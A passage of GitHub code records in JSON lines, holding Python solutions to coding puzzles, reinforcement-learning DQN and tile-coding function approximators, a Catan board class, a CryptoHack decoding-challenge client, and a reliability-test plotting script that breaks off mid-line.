target.\n \n - [2, 5, 6, 8, 9, 12, 14, 17]\n l (0) r len(nums) - 1\n '''\n r = len(nums) - 1\n l = 0\n \n while l <= r:\n mid = (l + r) // 2 # // means floor (Round numbers down to the nearest integer)\n if nums[mid] == target:\n return mid\n elif target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n return l\n \ns = Solution()\nprint(s.searchInsert([1,3,5,6], 2))\n# time complexity = O(logn) cutting list to half\n# space complexity = O(1)\n\n\n\n# soln 2\n\nclass Solution2(object):\n def searchInsert2(self, nums, target):\n \n if target > nums[len(nums) - 1]:\n return len(nums)\n \n for i in range(len(nums)):\n if nums[i] >= target:\n return i\n \ns = Solution2()\nprint(s.searchInsert2([1,3,5,6], 2))\n ","repo_name":"Jimmyopot/JimmyLeetcodeDev","sub_path":"Easy/search_insert_position.py","file_name":"search_insert_position.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2948800909","text":"import numpy as np\nimport torch\n\nfrom Experiment_Engine.networks import TwoLayerFullyConnected, TwoLayerDropoutFullyConnected, weight_init\nfrom Experiment_Engine.util import *\nfrom Experiment_Engine.Tilecoder3 import IHT, tiles\n\n\nclass NeuralNetworkFunctionApproximation:\n \"\"\"\n Parent class for all the neural networks\n summary: loss_per_step\n \"\"\"\n def __init__(self, config, summary=None):\n \"\"\"\n Config --- class that contains all the parameters in used in an experiment.\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n num_actions int 3 Number of actions available to the agent\n gamma float 1.0 discount factor\n epsilon float 0.1 exploration parameter\n state_dims int 2 number of dimensions of the environment's states\n optim str 'sgd' optimization method\n lr float 0.001 learning rate\n\n # DQN parameters\n batch_size int 32 minibatch size\n tnet_update_freq int 10 the update frequency of the target network\n\n # Parameters for storing summaries\n store_summary bool False store the summary of the agent\n number_of_steps int 500000 Total number of environment steps\n \"\"\"\n assert isinstance(config, Config)\n check_attribute_else_default(config, 'current_step', 0)\n self.config = config\n\n self.num_actions = check_attribute_else_default(config, 'num_actions', 3)\n self.gamma = check_attribute_else_default(config, 'gamma', 1.0)\n self.epsilon = check_attribute_else_default(config, 'epsilon', 0.1)\n self.state_dims = check_attribute_else_default(config, 'state_dims', 2)\n self.optim = check_attribute_else_default(config, 'optim', 'sgd', choices=['sgd', 'adam', 'rmsprop'])\n self.lr = check_attribute_else_default(config, 'lr', 0.001)\n # DQN parameters\n self.batch_size = check_attribute_else_default(config, 'batch_size', 32)\n self.tnet_update_freq = check_attribute_else_default(config, 'tnet_update_freq', 10)\n self.replay_buffer = ReplayBuffer(config)\n # summary parameters\n self.store_summary = check_attribute_else_default(config, 'store_summary', False)\n self.number_of_steps = check_attribute_else_default(config, 'number_of_steps', 500000)\n if self.store_summary:\n assert isinstance(summary, dict)\n self.summary = summary\n self.loss_per_step = np.zeros(self.number_of_steps, dtype=np.float64)\n check_dict_else_default(self.summary, 'loss_per_step', self.loss_per_step)\n\n self.h1_dims = 32 # fixed parameter\n self.h2_dims = 256 # fixed parameter\n\n # policy network\n self.net = TwoLayerFullyConnected(self.state_dims, h1_dims=self.h1_dims, h2_dims=self.h2_dims,\n output_dims=self.num_actions)\n self.net.apply(weight_init)\n # target network\n self.target_net = TwoLayerFullyConnected(self.state_dims, h1_dims=self.h1_dims, h2_dims=self.h2_dims,\n output_dims=self.num_actions)\n self.target_net.apply(weight_init)\n\n if self.optim == 'sgd': self.optimizer = torch.optim.SGD(self.net.parameters(), lr=self.lr)\n elif self.optim == 'adam': self.optimizer = torch.optim.Adam(self.net.parameters(), lr=self.lr)\n elif self.optim == 'rmsprop': self.optimizer = torch.optim.RMSprop(self.net.parameters(), lr=self.lr)\n\n def compute_return(self, reward, state, termination):\n # Computes the Qlearning return\n with torch.no_grad():\n av_function = torch.max(self.target_net.forward(state), dim=1)[0]\n next_step_bool = torch.from_numpy((1 - np.int64(termination))).float()\n qlearning_return = torch.from_numpy(reward).float() + next_step_bool * self.gamma * av_function\n return qlearning_return\n\n def choose_action(self, state):\n p = np.random.rand()\n if p > self.epsilon:\n with torch.no_grad():\n # it is extremely unlikely (prob = 0) for there to be two actions with exactly the same action value\n optim_action = self.net.forward(state).argmax().numpy()\n return np.int64(optim_action)\n else:\n return np.random.randint(self.num_actions)\n\n def save_summary(self, current_loss):\n if not self.store_summary:\n return\n self.summary['loss_per_step'][self.config.current_step - 1] = current_loss\n\n def update_target_network(self):\n if (self.config.current_step % self.tnet_update_freq) == 0:\n self.target_net.load_state_dict(self.net.state_dict())\n\n\nclass ReplayBuffer:\n\n def __init__(self, config):\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n state_dims int 2 number of dimensions of the environment's state\n buffer_size int 100 size of the buffer\n \"\"\"\n self.state_dims = check_attribute_else_default(config, 'state_dims', 2)\n self.buffer_size = check_attribute_else_default(config, 'buffer_size', 100)\n\n \"\"\" inner state \"\"\"\n self.start = 0\n self.length = 0\n\n self.state = np.empty((self.buffer_size, self.state_dims), dtype=np.float64)\n self.action = np.empty(self.buffer_size, dtype=int)\n self.reward = np.empty(self.buffer_size, dtype=np.float64)\n self.next_state = np.empty((self.buffer_size, self.state_dims), dtype=np.float64)\n self.next_action = np.empty(self.buffer_size, dtype=int)\n self.termination = np.empty(self.buffer_size, dtype=bool)\n\n def __getitem__(self, idx):\n if isinstance(idx, int):\n if idx < 0 or idx >= self.length:\n raise KeyError()\n elif isinstance(idx, np.ndarray):\n if (idx < 0).any() or (idx >= self.length).any():\n raise KeyError()\n shifted_idx = self.start + idx\n s = self.state.take(shifted_idx, axis=0, mode='wrap')\n a = self.action.take(shifted_idx, axis=0, mode='wrap')\n r = self.reward.take(shifted_idx, axis=0, mode='wrap')\n next_s = self.next_state.take(shifted_idx, axis=0, mode='wrap')\n next_a = self.next_action.take(shifted_idx, axis=0, mode='wrap')\n terminate = self.termination.take(shifted_idx, axis=0, mode='wrap')\n return s, a, r, next_s, next_a, terminate\n\n def store_transition(self, transition):\n if self.length < self.buffer_size:\n self.length += 1\n elif self.length == self.buffer_size:\n self.start = (self.start + 1) % self.buffer_size\n else:\n raise RuntimeError()\n\n storing_idx = (self.start + self.length - 1) % self.buffer_size\n state, action, reward, next_state, next_action, termination = transition\n self.state[storing_idx] = state\n self.action[storing_idx] = action\n self.reward[storing_idx] = reward\n self.next_state[storing_idx] = next_state\n self.next_action[storing_idx] = next_action\n self.termination[storing_idx] = termination\n\n def sample(self, sample_size):\n if sample_size > self.length or sample_size > self.buffer_size:\n raise ValueError(\"The sample size is to large.\")\n sampled_idx = np.random.randint(0, self.length, sample_size) # Sample any indices\n # sampled_idx = np.random.choice(self.length, size=sample_size, replace=False) # Sample unique indices\n return self.__getitem__(sampled_idx)\n\n\nclass VanillaDQN(NeuralNetworkFunctionApproximation):\n\n def __init__(self, config, summary=None):\n super(VanillaDQN, self).__init__(config, summary)\n\n def update(self, state, action, reward, next_state, next_action, termination):\n self.replay_buffer.store_transition(transition=(state, action, reward, next_state, next_action, termination))\n\n if self.replay_buffer.length < self.batch_size:\n self.save_summary(0)\n return\n\n state, action, reward, next_state, next_action, termination = self.replay_buffer.sample(self.batch_size)\n qlearning_return = self.compute_return(reward, next_state, termination)\n self.optimizer.zero_grad()\n prediction = torch.squeeze(self.net(state).gather(1, torch.from_numpy(action).view(-1,1)))\n loss = (qlearning_return - prediction).pow(2).mean()\n loss.backward()\n self.optimizer.step()\n\n self.save_summary(loss.detach().numpy())\n self.update_target_network()\n\n\nclass DistRegNeuralNetwork(NeuralNetworkFunctionApproximation):\n \"\"\"\n Neural network with distributional regularizers. This is the implementation of the ReLu + SKL network from:\n \"The Utility of Sparse Representations for Control in Reinforcement Learning\"\n - Vincent Liu, Raksha Kumaraswamy, Lei Le, and Martha White\n \"\"\"\n def __init__(self, config, summary=None):\n super(DistRegNeuralNetwork, self).__init__(config, summary=summary)\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n reg_factor float 0.1 \n beta float 0.1 average max activation\n use_gamma bool False whether to use a gamma distribution instead of beta\n layer2_reg bool False whether to apply regularization only to the second\n layer \n beta_lb float False whether to set a lower bound for beta \n \"\"\"\n self.config = config\n self.reg_factor = check_attribute_else_default(config, 'reg_factor', 0.1)\n self.beta = check_attribute_else_default(config, 'beta', 0.1)\n self.use_gamma = check_attribute_else_default(config, 'use_gamma', False)\n self.beta_lb = check_attribute_else_default(config, 'beta_lb', False) # lower bounds beta by 0.1\n self.beta_fixed_lower_bound = 0.1\n\n def update(self, state, action, reward, next_state, next_action, termination):\n self.replay_buffer.store_transition(transition=(state, action, reward, next_state, next_action, termination))\n\n if self.replay_buffer.length < self.batch_size:\n self.save_summary(0)\n return\n\n state, action, reward, next_state, next_action, termination = self.replay_buffer.sample(self.batch_size)\n qlearning_return = self.compute_return(reward, next_state, termination)\n self.optimizer.zero_grad()\n x1, x2, x3 = self.net.forward(state, return_activations=True)\n prediction = torch.squeeze(x3.gather(1, torch.from_numpy(action).view(-1,1)))\n # unregularized loss\n loss = (qlearning_return - prediction).pow(2).mean()\n if self.use_gamma:\n layer2_average = x2.mean()\n kld_layer2 = self.kld(layer2_average)\n loss += self.reg_factor * kld_layer2 * self.h2_dims\n if self.beta_lb:\n kld_lb_layer2 = self.kld_lb(layer2_average)\n loss += self.reg_factor * kld_lb_layer2 * self.h2_dims\n else:\n layer2_average = x2.mean(dim=0)\n kld_layer2 = self.kld(layer2_average)\n loss += self.reg_factor * kld_layer2\n if self.beta_lb:\n kld_lb_layer2 = self.kld_lb(layer2_average)\n loss += self.reg_factor * kld_lb_layer2\n loss.backward()\n self.optimizer.step()\n\n self.save_summary(loss.detach().numpy())\n self.update_target_network()\n\n def kld_derivative(self, beta_hats):\n # Note: you can use either kld_derivative or kld. Both results in the same gradient when using autograd.\n positive_beta_hats = beta_hats[beta_hats > self.beta]\n first_term = 1 / positive_beta_hats\n second_term = torch.pow(first_term, 2) * self.beta\n kld_derivative = torch.sum((first_term - second_term))\n return kld_derivative\n\n def kld(self, beta_hats):\n positive_beta_hats = beta_hats[beta_hats > 0]\n high_beta_hats = positive_beta_hats[positive_beta_hats > self.beta]\n # the original kl divergence is: log(beta_hat) + (beta / beta_hat) - log(beta) - 1\n # however, since beta doesn't depend on the parameters of the network, omitting the term -log(beta) - 1 doesn't\n # have any effect on the gradient.\n return torch.sum(torch.log(high_beta_hats) + (self.beta / high_beta_hats))\n\n def kld_lb(self, beta_hats):\n # this is the same as kld but for applied when beta is less than 0.05, which enforces a lower bound on beta\n positive_beta_hats = beta_hats[beta_hats > 0]\n low_beta_hats = positive_beta_hats[positive_beta_hats < self.beta_fixed_lower_bound]\n return torch.sum(torch.log(low_beta_hats) + (self.beta / low_beta_hats))\n\n\nclass RegularizedNeuralNetwork(NeuralNetworkFunctionApproximation):\n \"\"\"\n Neural network with L1 or L2 regularization on the weights or the activations\n \"\"\"\n def __init__(self, config, summary=None):\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n reg_factor float 0.1 factor for the regularization method\n reg_method string 'l1' regularization method. Choices: 'none', 'l1', 'l2'\n weights_reg bool False whether to apply regularization on the weights or\n the activations\n \"\"\"\n super(RegularizedNeuralNetwork, self).__init__(config, summary=summary)\n self.reg_factor = check_attribute_else_default(config, 'reg_factor', 0.1)\n self.reg_method = check_attribute_else_default(config, 'reg_method', 'l1',\n choices=['l1', 'l2'])\n self.weights_reg = check_attribute_else_default(config, 'weights_reg', False)\n\n if self.reg_method == 'l1':\n self.reg_function = torch.abs\n elif self.reg_method == 'l2':\n self.reg_function = lambda z: torch.pow(z, 2)\n\n def update(self, state, action, reward, next_state, next_action, termination):\n self.replay_buffer.store_transition(transition=(state, action, reward, next_state, next_action, termination))\n\n if self.replay_buffer.length < self.batch_size:\n self.save_summary(0)\n return\n\n state, action, reward, next_state, next_action, termination = self.replay_buffer.sample(self.batch_size)\n qlearning_return = self.compute_return(reward, next_state, termination)\n self.optimizer.zero_grad()\n x1, x2, x3 = self.net.forward(state, return_activations=True)\n # I don't like the line bellow because it is doing so many things. Here's a breakdown of what it does:\n # torch.squeeze - eliminates all the dimensions that are equal to 1\n # x3.gather - the first argument indicates the axis, the second argument indicates what item to gather\n # torch.from_numpy - converts the actions to a torch tensor\n # .view(-1, 1) - reshapes the tensor into tensor of shape batch_size x 1\n prediction = torch.squeeze(x3.gather(1, torch.from_numpy(action).view(-1,1)))\n loss = (qlearning_return - prediction).pow(2).mean()\n reg_loss = 0\n if self.weights_reg:\n for name, param in self.net.named_parameters():\n # Regularization is only applied to the representation part of the network\n if not name.startswith('fc3'):\n reg_loss += torch.sum(self.reg_function(param))\n else:\n reg_loss += torch.sum(self.reg_function(x2))\n loss += self.reg_factor * reg_loss\n loss.backward()\n self.optimizer.step()\n\n self.save_summary(loss.detach().numpy())\n self.update_target_network()\n\n\nclass DropoutNeuralNetwork(VanillaDQN):\n \"\"\"\n The dropout neural network applies dropout only to the prediction from the policy network when computing the TD\n error of Q-learning. Otherwise, the models are set to eval() when computing the target of the TD error and when\n selecting actions --- which multiplies the activations by the dropout probability. Reasoning: Both the target and\n the actions should be computed using action-values that are as accurate as possible. We don't care that the neural\n network that computes them is sparse; we just care about the values being accurate.\n \"\"\"\n def __init__(self, config, summary=None):\n assert isinstance(config, Config)\n super(DropoutNeuralNetwork, self).__init__(config, summary=summary)\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n dropout_probability float 0.5 probability of setting activations to zero\n \"\"\"\n self.dropout_probability = check_attribute_else_default(config, 'dropout_probability', 0.5)\n\n # policy network\n self.net = TwoLayerDropoutFullyConnected(self.state_dims, h1_dims=self.h1_dims, h2_dims=self.h2_dims,\n output_dims=self.num_actions,\n dropout_probability=self.dropout_probability)\n self.net.apply(weight_init)\n self.net.train()\n # target network\n self.target_net = TwoLayerDropoutFullyConnected(self.state_dims, h1_dims=self.h1_dims, h2_dims=self.h2_dims,\n output_dims=self.num_actions,\n dropout_probability=self.dropout_probability)\n self.target_net.apply(weight_init)\n self.target_net.eval()\n\n if self.optim == 'sgd': self.optimizer = torch.optim.SGD(self.net.parameters(), lr=self.lr)\n elif self.optim == 'adam': self.optimizer = torch.optim.Adam(self.net.parameters(), lr=self.lr)\n elif self.optim == 'rmsprop': self.optimizer = torch.optim.RMSprop(self.net.parameters(), lr=self.lr)\n\n def choose_action(self, state):\n p = np.random.rand()\n if p > self.epsilon:\n self.net.eval()\n with torch.no_grad():\n optim_action = self.net.forward(state).argmax().numpy()\n self.net.train()\n return np.int64(optim_action)\n else:\n return np.random.randint(self.num_actions)\n\n\nclass TileCoderFA:\n\n def __init__(self, config=None):\n super().__init__()\n assert isinstance(config, Config)\n \"\"\"\n Parameters in config:\n Name: Type: Default: Description: (Omitted when self-explanatory)\n num_tilings int 32 Number of tilings\n tiling_length int 8 The length of the tiling side\n num_actions int 3 Number of actions\n gamma float 1.0 discount factor\n epsilon float 0.1 exploration parameter\n state_dims int 2 Number of dimensions\n lr float 0.1 Learning rate\n scaling_factor np.array [1,1] The scaling factor and scaling offset are such so\n scaling_offset np.array [0,0] (observation + scaling_offset) * scaling factor\n is within 0 and 1\n \"\"\"\n self.num_tilings = check_attribute_else_default(config, 'num_tilings', 32)\n self.tiling_length = check_attribute_else_default(config, 'tiling_length', 8)\n self.num_actions = check_attribute_else_default(config, 'num_actions', 3)\n self.gamma = check_attribute_else_default(config, 'gamma', 1.0)\n self.epsilon = check_attribute_else_default(config, 'epsilon', 0.1)\n self.state_dims = check_attribute_else_default(config, 'state_dims', 2)\n self.lr = check_attribute_else_default(config, 'lr', 0.1)\n self.scaling_factor = check_attribute_else_default(config, 'scaling_factor',\n np.ones(self.state_dims, dtype=np.float64))\n self.scaling_offset = check_attribute_else_default(config, 'scaling_offset',\n np.ones(self.state_dims, dtype=np.float64))\n\n # Why the self.tiling_length + 1? Because of the random off-set of each tiling, some tilings might not cover\n # the entire region of (self.tiling_length) ** self.state_dims. However, all the observations are scaled\n # down to that region. Hence, if we don't add the + 1, some observations might fall outside of the region\n # covered by the tilings.\n self.tiles_per_tiling = (self.tiling_length + 1) ** self.state_dims\n self.num_tiles = self.num_tilings * self.tiles_per_tiling\n self.theta = 0.001 * np.random.random(self.num_tiles * self.num_actions)\n self.iht = IHT(self.num_tiles)\n\n \"\"\" Scales input states to (0,1) and then multiplies by the side_length of a tiling \"\"\"\n def scaling_function(self, state):\n assert len(state) == self.state_dims\n scaled_state = (state + self.scaling_offset) * self.scaling_factor * self.tiling_length\n return scaled_state\n\n \"\"\" Updates the value of the parameters corresponding to the state and action \"\"\"\n def update(self, state, action, reward, next_state, next_action, termination):\n current_estimate = self.get_action_values(state)[action]\n qlearning_return = self.compute_return(reward, next_state, termination)\n value = qlearning_return - current_estimate\n scaled_state = self.scaling_function(state)\n\n tile_indices = np.asarray(\n tiles(self.iht, self.num_tilings, scaled_state), dtype=int) + (action * self.num_tiles)\n self.theta[tile_indices] += self.lr * value\n\n \"\"\" Returns the QLearning return of a specific state pair \"\"\"\n def compute_return(self, reward, state, termination):\n max_av = np.max(self.get_action_values(state))\n qlearning_return = reward + (1 - np.int64(termination)) * max_av\n return qlearning_return\n\n def get_action_values(self, state):\n scaled_state = self.scaling_function(state)\n tile_indices = np.asanyarray(tiles(self.iht, self.num_tilings, scaled_state), dtype=np.int64)\n action_values = np.zeros(self.num_actions, dtype=np.float64)\n for i in range(self.num_actions):\n av = np.sum(self.theta[tile_indices + (i * self.num_tiles)])\n action_values[i] = av\n return action_values\n\n def choose_action(self, state):\n p = np.random.rand()\n if p > self.epsilon:\n argmax_av = np.int64(self.get_action_values(state).argmax())\n return argmax_av\n else:\n return np.random.randint(self.num_actions)\n\n def save_summary(self):\n pass\n","repo_name":"JFernando4/SparseRepresentations_wReplayBuffer","sub_path":"Experiment_Engine/function_approximators.py","file_name":"function_approximators.py","file_ext":"py","file_size_in_byte":24242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6068983012","text":"def transfer_time_to_second(time_str):\n h, m, s = map(int, time_str.split(':'))\n\n h *= 60 * 60\n m *= 60\n\n return h + m + s\n\n\ndef transfer_second_to_time(second):\n h = second // (60 * 60)\n second -= 60 * 60 * h\n m = second // 60\n second -= 60 * m\n\n return f'{str(h).zfill(2)}:{str(m).zfill(2)}:{str(second).zfill(2)}'\n\n\ndef solution(play_time, adv_time, logs):\n answer = 0\n\n play_time = transfer_time_to_second(play_time)\n adv_time = transfer_time_to_second(adv_time)\n\n dp = [0] * (play_time + 1)\n\n for log in logs:\n start, end = log.split('-')\n start = transfer_time_to_second(start)\n end = transfer_time_to_second(end)\n\n dp[start] += 1\n dp[end] -= 1\n\n for i in range(1, len(dp)):\n dp[i] = dp[i - 1] + dp[i]\n\n for i in range(1, len(dp)):\n dp[i] = dp[i - 1] + dp[i]\n\n dp_count = 1\n max_value = 0\n\n # 0번째 대응\n sum_value = dp[adv_time]\n if sum_value > max_value:\n max_value = sum_value\n answer = 0\n\n while dp_count + adv_time <= play_time:\n sum_value = dp[dp_count + adv_time] - dp[dp_count]\n if sum_value > max_value:\n max_value = sum_value\n answer = dp_count + 1\n dp_count += 1\n return transfer_second_to_time(answer)\n","repo_name":"bruno-wi/Backjun","sub_path":"Python/contest/카카오_2021_광고삽입.py","file_name":"카카오_2021_광고삽입.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74502851047","text":"# https://leetcode.com/problems/lemonade-change/submissions/\nfrom collections import defaultdict\nfrom typing import List\nclass Solution:\n def lemonadeChange(self, bills: List[int]) -> bool:\n cash = defaultdict(int)\n \n for b in bills:\n if b == 10:\n if cash[5] == 0:\n return False\n cash[5] -= 1\n elif b == 20:\n # it is critical to give 10 as change first whenever possible\n if cash[10] > 0 and cash[5] > 0:\n cash[10] -= 1\n cash[5] -= 1\n elif cash[5] > 2:\n cash[5] -= 3\n else:\n return False\n cash[b] += 1\n # print(b, cash)\n \n return True","repo_name":"linminhtoo/algorithms","sub_path":"greedy/easy/lemonadeChange.py","file_name":"lemonadeChange.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17065993472","text":"from Tile import Tile\n\n\nclass Board:\n\n def __init__(self, numbers):\n self.board = []\n input_index = 0\n\n def addRow(row_length, row_number, row_number_from_center, input_index):\n self.board.append([Tile(0, [0, 0])])\n\n if (row_number_from_center > 0):\n x_coordinate = row_number_from_center\n for i in range(row_length):\n self.board[row_number].append(\n Tile(numbers[input_index], [x_coordinate, row_number]))\n input_index += 1\n x_coordinate += 1\n else:\n for i in range(row_length):\n self.board[row_number].append(\n Tile(numbers[input_index], [len(self.board[row_number])-1, row_number]))\n input_index += 1\n\n self.board[row_number].append(Tile(0, [0, 0]))\n return input_index\n\n input_index = addRow(3, 0, 2, input_index)\n input_index = addRow(4, 1, 1, input_index)\n input_index = addRow(5, 2, 0, input_index)\n input_index = addRow(4, 3, -1, input_index)\n input_index = addRow(3, 4, -2, input_index)\n\n def getItemAtIndex(self, index1, index2):\n return self.board[index1][index2]\n\n def getAllNumbers(self):\n board = []\n for i in range(5):\n row = []\n for t in range(len(self.board[i])):\n row.append(str(self.board[i][t].number))\n board.append('-'.join(row))\n return \"\\n\".join(board)\n\n def __repr__(self):\n board = []\n for i in range(5):\n row = []\n for t in range(len(self.board[i])):\n row.append(str(self.board[i][t].coordinates))\n board.append('-'.join(row))\n return \"\\n\".join(board)\n","repo_name":"tudor-seserman/CatanBoardOptimizer","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23465635284","text":"from pwn import *\nimport json\nimport base64\nimport binascii\nimport codecs\nimport sys\nfrom Crypto.Util.number import *\n\nr = remote('socket.cryptohack.org', 13377, level = 'debug')\n\ndef json_recv():\n line = r.recvline()\n return json.loads(line.decode())\n\ndef json_send(hsh):\n request = json.dumps(hsh).encode()\n r.sendline(request)\n\ndef decode(t, data):\n if t == 'base64':\n return base64.b64decode(data).decode('utf-8')\n elif t == 'hex':\n return bytes.fromhex(data).decode('utf-8')\n elif t == 'bigint':\n return bytes.fromhex(data.replace('0x', '')).decode('utf-8')\n elif t == 'rot13':\n return codecs.encode(data, 'rot_13')\n elif t == 'utf-8':\n return \"\".join(chr(i) for i in received[\"encoded\"])\n\nwhile True:\n\n received = json_recv()\n\n if \"flag\" in received:\n print(\"FLAG: %s\" % received[\"flag\"])\n sys.exit(0)\n\n decifrado = decode(received[\"type\"], received[\"encoded\"])\n print(\"\\nDecifrado \" + decifrado);\n\n to_send = {\n \"decoded\": decifrado\n }\n\n json_send(to_send)\n\n","repo_name":"matingb/university","sub_path":"criptografia/pwntools_example.py","file_name":"pwntools_example.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24037556181","text":"import glob\r\nimport os\r\nimport re\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.ticker as mtick\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\nimport PythonModules.progressBar as pgB\r\nimport PythonModules.logger_finder as logger_finder\r\n\r\nfrom tkinter.filedialog import askopenfilename\r\n\r\n# plots rel trend plots\r\ndef data_importer(inputcsv, manual, range_arr):\r\n inputdf = pd.read_csv(inputcsv)\r\n\r\n ori_path = os.getcwd()\r\n path = 'X://PLC//Prod Docs//Qual//qrw_script//'\r\n extension = \"xlsm\"\r\n os.chdir(path)\r\n all_xlsx_files = glob.glob('*.{}'.format(extension))\r\n return_arr = []\r\n for xlsx_file in all_xlsx_files:\r\n if str('test_initiator') in xlsx_file and '~$' not in xlsx_file:\r\n return_arr.append(xlsx_file)\r\n return_arr = ntSort(return_arr)\r\n return_path = path + return_arr[-1]\r\n os.chdir(ori_path)\r\n limits_path = return_path\r\n \r\n initiator = limits_path\r\n initiator_df = pd.read_excel(initiator, sheet_name = 'product_id')\r\n \r\n result_df_list = []\r\n if manual:\r\n result_df_master = inputdf.loc[(inputdf['Test Hours_Cycles'] == float(range_arr[0]))]\r\n else:\r\n result_df_master = inputdf.loc[(inputdf['Test Hours_Cycles'] == 1000)]\r\n\r\n filter_df = pd.read_excel(logger_finder.file_finder('merge_file_filter'))\r\n logger_df = pd.read_excel(logger_finder.get_logger())\r\n\r\n filter_df = filter_df.dropna(axis = 1, how = 'all')\r\n filter_df_columns = filter_df.columns.tolist()\r\n filter_df_columns.remove('Test')\r\n filter_df_columns.remove('Product')\r\n \r\n pd.options.mode.chained_assignment = None # default='warn'\r\n for index, row in result_df_master.iterrows():\r\n for filter_df_col in filter_df_columns:\r\n target_row = logger_df.loc[(logger_df['UID'] == row['UID'])]\r\n target_info = str(target_row.loc[:,filter_df_col].iloc[0])\r\n result_df_master.loc[index,filter_df_col] = target_info\r\n pd.options.mode.chained_assignment = 'warn' # default='warn'\r\n \r\n \r\n for test, df_test in result_df_master.groupby('Rel Test'):\r\n for volt, df_volt in df_test.groupby(filter_df_columns):\r\n result_df_list.append(df_volt)\r\n\r\n for result_df in result_df_list:\r\n result_df_test = str(list(dict.fromkeys(result_df.loc[:,'Rel Test'].tolist()))[0])\r\n result_df_conds = []\r\n result_df_conds.append(result_df_test)\r\n for filter_df_col_2 in filter_df_columns:\r\n cond = str(list(dict.fromkeys(result_df.loc[:,filter_df_col_2].tolist()))[0])\r\n result_df_conds.append(cond)\r\n \r\n joined_name = '_'.join(result_df_conds)\r\n print(joined_name)\r\n\r\n result_datecodes_list = result_df['YYWW_datecode'].tolist()\r\n result_datecodes_list = list(dict.fromkeys(result_datecodes_list))\r\n \r\n product_id_list = []\r\n series_id_list = []\r\n part_list = result_df['product'].tolist()\r\n for part in part_list:\r\n part_result_df = initiator_df.loc[(initiator_df['product'] == part)]\r\n prod_id = part_result_df['die']\r\n series_id = part_result_df['series']\r\n product_id_list.append(prod_id.to_string(index=False))\r\n series_id_list.append(series_id.to_string(index=False))\r\n\r\n series_id_list_cleaned = ntSort(list(dict.fromkeys(series_id_list)))\r\n\r\n pd.options.mode.chained_assignment = None # default='warn'\r\n result_df.loc[:,\"die\"] = product_id_list\r\n result_df.loc[:,\"series\"] = series_id_list\r\n pd.options.mode.chained_assignment = 'warn' # default='warn'\r\n\r\n id_list_cleaned = series_id_list_cleaned\r\n\r\n df_list = []\r\n for region_2, df_region_2 in result_df.groupby('series'):\r\n df_list.append(df_region_2)\r\n\r\n desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\r\n\r\n columns_arr = ['Rdson_aging(%)','Vth_aging(%)','Igss_rise(x)','Idoff_rise(x)']\r\n for c in columns_arr:\r\n pgB.printProgressBar(0, len(df_list), prefix = c + 'Graphs Progress:', suffix = 'Complete', length = 50)\r\n for i in range(len(df_list)):\r\n df_TEMP = df_list[i].copy()\r\n df_TEMP = df_TEMP.sort_values(by = ['YYWW_datecode'])\r\n if c == 'Rdson_aging(%)' or c == 'Vth_aging(%)':\r\n df_TEMP.loc[:,c] = df_TEMP.loc[:,c] * 100\r\n\r\n pd.options.mode.chained_assignment = None # default='warn'\r\n df_TEMP.loc[:,\"YYWW_datecode\"] = df_TEMP.loc[:,\"YYWW_datecode\"] + '_' + df_TEMP.loc[:,\"die\"]\r\n pd.options.mode.chained_assignment = 'warn' # default='warn'\r\n\r\n df_TEMP_pal = df_TEMP[['YYWW_datecode','die']].copy()\r\n df_TEMP_pal = df_TEMP_pal.drop_duplicates()\r\n\r\n # constructs a colour palette based on number of devices\r\n pal_tuple_list = []\r\n palette_list = []\r\n palette_list_nodie = []\r\n die_list = df_TEMP_pal['die'].tolist()\r\n df_TEMP_pal_sub = df_TEMP_pal['die'].copy()\r\n df_TEMP_pal_sub = df_TEMP_pal_sub.drop_duplicates()\r\n df_TEMP_pal_sub_die = df_TEMP_pal_sub.tolist()\r\n total_colours_needed = len(df_TEMP_pal_sub_die)\r\n palette = sns.color_palette(\"hls\", total_colours_needed)\r\n for die_ind in range(len(df_TEMP_pal_sub_die)):\r\n pal_tuple_list.append((df_TEMP_pal_sub_die[die_ind],palette[die_ind]))\r\n\r\n for die_list_ind in range(len(die_list)):\r\n for pal_tuple in pal_tuple_list:\r\n if pal_tuple[0] == die_list[die_list_ind]:\r\n palette_list.append(pal_tuple)\r\n \r\n for pall in palette_list:\r\n palette_list_nodie.append(pall[1])\r\n \r\n palette = palette_list_nodie.copy()\r\n\r\n i_no_number = ''.join([ii for ii in str(i) if not ii.isdigit()])\r\n plt_filename = 'plt_' + joined_name + '_' + str(id_list_cleaned[i]) + '_' + str(i_no_number) + str(c)\r\n plt.figure(figsize=(30, 15))\r\n sns.set_theme(style=\"whitegrid\")\r\n plotname = 'plt_' + joined_name + '_' + str(i)\r\n plotname = sns.boxplot(x=\"YYWW_datecode\", y=c, data=df_TEMP, width=0.5, palette=palette)\r\n plotname.legend(labels = df_TEMP_pal_sub_die, loc=6, bbox_to_anchor=(1, 0.5), ncol=1, fontsize = 25)\r\n plotname.set_title(c + ' ' + joined_name + '_' + str(id_list_cleaned[i]), fontsize = 25)\r\n plotname.set_xlabel(\"YYWW_datecode_Product\", fontsize = 20)\r\n plotname.set_ylabel(c, fontsize = 20)\r\n plotname.set_xticklabels(plotname.get_xticklabels(),rotation = 90. , fontsize = 